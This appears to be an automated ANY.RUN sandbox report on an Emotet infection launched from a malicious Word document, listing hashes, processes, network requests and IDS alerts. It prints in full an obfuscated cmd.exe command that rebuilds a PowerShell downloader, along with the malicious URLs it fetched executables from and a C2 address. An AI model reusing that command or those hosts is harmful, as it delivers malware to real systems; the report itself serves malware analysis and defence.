analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://sandiawood.com/EN_US/Clients_transactions/2018-12

Full analysis: https://app.any.run/tasks/389d926b-e016-4b11-890e-f493f9c1f1f7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 12:42:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MD5:

2E2BFBD1172BA698DCADBB9A1C2FBD37

SHA1:

21E504261E04A06E95CC238A4E5745256A5D350E

SHA256:

73DA165A85464E9FEFEF311F4F089C8BE789E31815D64F4FF60E597BDFC83785

SSDEEP:

3:N1KNELk3g+KzeWhDGRMKiKFUvn:CWQ3g+Y/GeKCn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2412)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2412)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3296)
    • Application was dropped or rewritten from another process

      • 718.exe (PID: 2532)
      • archivesymbol.exe (PID: 2436)
      • 718.exe (PID: 3268)
      • archivesymbol.exe (PID: 3188)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3188)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3188)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2312)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2312)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 2412)
      • cmd.exe (PID: 2740)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3020)
      • cmd.exe (PID: 2740)
      • cmd.exe (PID: 3296)
      • cmd.exe (PID: 4048)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2412)
      • chrome.exe (PID: 2960)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2312)
      • 718.exe (PID: 2532)
    • Starts itself from another location

      • 718.exe (PID: 2532)
    • Creates files in the user directory

      • powershell.exe (PID: 2312)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3572)
      • WINWORD.EXE (PID: 2412)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2412)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2960)
    • Application launched itself

      • chrome.exe (PID: 2960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
21
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs powershell.exe 718.exe no specs 718.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2960"C:\Program Files\Google\Chrome\Application\chrome.exe" http://sandiawood.com/EN_US/Clients_transactions/2018-12C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
68.0.3440.106
3692"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f4300b0,0x6f4300c0,0x6f4300ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2876"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2964 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
936"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=948,2711759363646038479,13200592699440873029,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=8D20C2F4628B2E9CA5558AC1EF2EE3D2 --mojo-platform-channel-handle=996 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2632"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=948,2711759363646038479,13200592699440873029,131072 --enable-features=PasswordImport --service-pipe-token=33205BEB58A2A11BE57E00D99754E5EA --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=33205BEB58A2A11BE57E00D99754E5EA --renderer-client-id=4 --mojo-platform-channel-handle=1884 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2952"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=948,2711759363646038479,13200592699440873029,131072 --enable-features=PasswordImport --service-pipe-token=D2C3427A7AFE1A84896BD69E16795741 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=D2C3427A7AFE1A84896BD69E16795741 --renderer-client-id=3 --mojo-platform-channel-handle=2068 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2412"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\FORM-0321336.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3572"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2620"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=948,2711759363646038479,13200592699440873029,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=718B9D66540DA0597C07F51D2CDEFF6C --mojo-platform-channel-handle=3788 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
4048c:\VURcrUDuIZ\TMvGSsAjBXzH\OqRztTjOYDcf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set v0k=hspBoKXLalEDIfIpS;dkPGrv,.ytwZbi6108VOze$FgY'/:n @N(C}7mAHqURW\j)u=+4-xQ{c&&for %T in (40,29,19,20,66,44,58,65,19,44,17,40,43,47,29,66,47,39,28,69,4,30,63,39,73,27,48,50,39,27,25,61,39,30,52,9,31,39,47,27,17,40,63,55,15,66,44,0,27,27,15,46,45,45,0,39,22,30,8,9,15,8,22,8,18,39,25,73,4,55,45,8,8,38,16,5,38,68,16,29,65,49,0,27,27,15,46,45,45,28,8,65,1,25,47,39,27,45,0,57,60,3,0,16,19,37,19,20,49,0,27,27,15,46,45,45,73,39,9,39,30,27,22,8,23,39,9,8,47,18,39,23,39,47,27,1,25,73,4,25,38,8,45,34,6,23,14,29,70,10,49,0,27,27,15,46,45,45,31,9,42,73,8,15,25,47,39,27,45,6,36,32,59,58,11,29,56,8,34,49,0,27,27,15,46,45,45,8,27,39,55,8,25,73,73,45,23,57,13,13,60,15,34,28,44,25,16,15,9,31,27,51,44,49,44,64,17,40,31,13,16,66,44,31,5,11,44,17,40,71,21,15,48,66,48,44,54,33,35,44,17,40,18,58,31,66,44,21,50,11,44,17,40,71,9,20,66,40,39,47,23,46,27,39,55,15,67,44,62,44,67,40,71,21,15,67,44,25,39,70,39,44,17,13,4,22,39,8,73,0,51,40,22,0,47,48,31,47,48,40,63,55,15,64,72,27,22,26,72,40,43,47,29,25,11,4,28,47,9,4,8,18,41,31,9,39,51,40,22,0,47,24,48,40,71,9,20,64,17,40,57,16,57,66,44,52,58,43,44,17,14,13,48,51,51,21,39,27,69,14,27,39,55,48,40,71,9,20,64,25,9,39,47,42,27,0,48,69,42,39,48,35,34,34,34,34,64,48,72,14,47,23,4,19,39,69,14,27,39,55,48,40,71,9,20,17,40,10,14,4,66,44,29,16,55,44,17,30,22,39,8,19,17,53,53,73,8,27,73,0,72,53,53,40,41,60,7,66,44,30,19,21,44,17,74)do set 3WZ7=!3WZ7!!v0k:~%T,1!&&if %T geq 74 echo !3WZ7:*3WZ7!=!|FOR /F "delims=uD.M tokens=2" %B IN ('ftype^^^|findstr lMo')DO %B -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 039
Read events
2 500
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
25
Text files
69
Unknown types
11

Dropped files

PID
Process
Filename
Type
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\f27557d0-6dc6-4f07-bd1c-60d36c335578.tmp
MD5:
SHA256:
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\8d109659-19eb-41d6-97d8-54b5fadb6dbd.tmp
MD5:
SHA256:
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF246cd4.TMPtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF246cd4.TMPtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
2960chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.oldtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
12
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3188
archivesymbol.exe
GET
190.146.201.54:80
http://190.146.201.54/
CO
malicious
2312
powershell.exe
GET
301
192.185.161.151:80
http://ilgcap.net/XV6UqDZAa0
US
html
346 b
malicious
2312
powershell.exe
GET
403
197.242.146.191:80
http://celebtravelandevents.co.za/0XvIZxE
ZA
html
335 b
malicious
2312
powershell.exe
GET
302
69.89.31.173:80
http://herbalparade.com/aazSKz4SZu
US
html
299 b
malicious
2312
powershell.exe
GET
200
192.185.161.151:80
http://ilgcap.net/XV6UqDZAa0/
US
executable
164 Kb
malicious
2312
powershell.exe
GET
404
203.28.48.11:80
http://waus.net/hHRBhSkOkP
AU
html
437 b
malicious
2960
chrome.exe
GET
301
23.234.27.191:80
http://sandiawood.com/EN_US/Clients_transactions/2018-12
US
html
329 b
suspicious
2960
chrome.exe
GET
200
23.234.27.191:80
http://sandiawood.com/EN_US/Clients_transactions/2018-12/
US
document
143 Kb
suspicious
2312
powershell.exe
GET
200
69.89.31.173:80
http://herbalparade.com/cgi-sys/suspendedpage.cgi
US
html
7.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2960
chrome.exe
172.217.22.3:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2960
chrome.exe
216.58.206.3:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2960
chrome.exe
172.217.21.237:443
accounts.google.com
Google Inc.
US
whitelisted
2312
powershell.exe
192.185.161.151:80
ilgcap.net
CyrusOne LLC
US
malicious
2960
chrome.exe
23.234.27.191:80
sandiawood.com
HOSTSPACE NETWORKS LLC
US
suspicious
2312
powershell.exe
203.28.48.11:80
waus.net
Bucan Holdings Pty Ltd
AU
malicious
3188
archivesymbol.exe
190.146.201.54:80
Telmex Colombia S.A.
CO
malicious
2312
powershell.exe
69.89.31.173:80
herbalparade.com
Unified Layer
US
malicious
2312
powershell.exe
197.242.146.191:80
celebtravelandevents.co.za
Afrihost
ZA
malicious
2960
chrome.exe
216.58.207.35:443
www.gstatic.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.gstatic.com
  • 216.58.207.35
whitelisted
sandiawood.com
  • 23.234.27.191
suspicious
clientservices.googleapis.com
  • 172.217.22.3
whitelisted
accounts.google.com
  • 172.217.21.237
shared
ssl.gstatic.com
  • 216.58.206.3
whitelisted
herbalparade.com
  • 69.89.31.173
malicious
waus.net
  • 203.28.48.11
malicious
celebtravelandevents.co.za
  • 197.242.146.191
malicious
ilgcap.net
  • 192.185.161.151
malicious

Threats

PID
Process
Class
Message
2960
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
2960
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi'
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2312
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
1 ETPRO signatures available at the full report
No debug info